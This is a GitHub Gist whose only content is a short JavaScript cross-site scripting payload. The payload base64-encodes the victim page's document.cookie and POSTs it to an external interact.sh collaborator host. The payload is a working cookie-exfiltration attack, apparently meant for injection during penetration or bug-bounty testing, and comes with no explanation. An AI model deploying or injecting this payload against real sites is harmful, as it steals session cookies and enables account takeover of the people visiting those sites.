Created
March 26, 2022 16:34
-
-
Save sudoaza/afa7cdc79bd5d50e203d4f8386e353be to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// <script> | |
let collab = "c8xq3e52vtc0000hxsx0grq5tzyyyyyyb.interact.sh"; | |
let xhr = new XMLHttpRequest(); | |
xhr.open("POST", "http://" + collab); | |
xhr.send(btoa(document.cookie)); | |
// </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.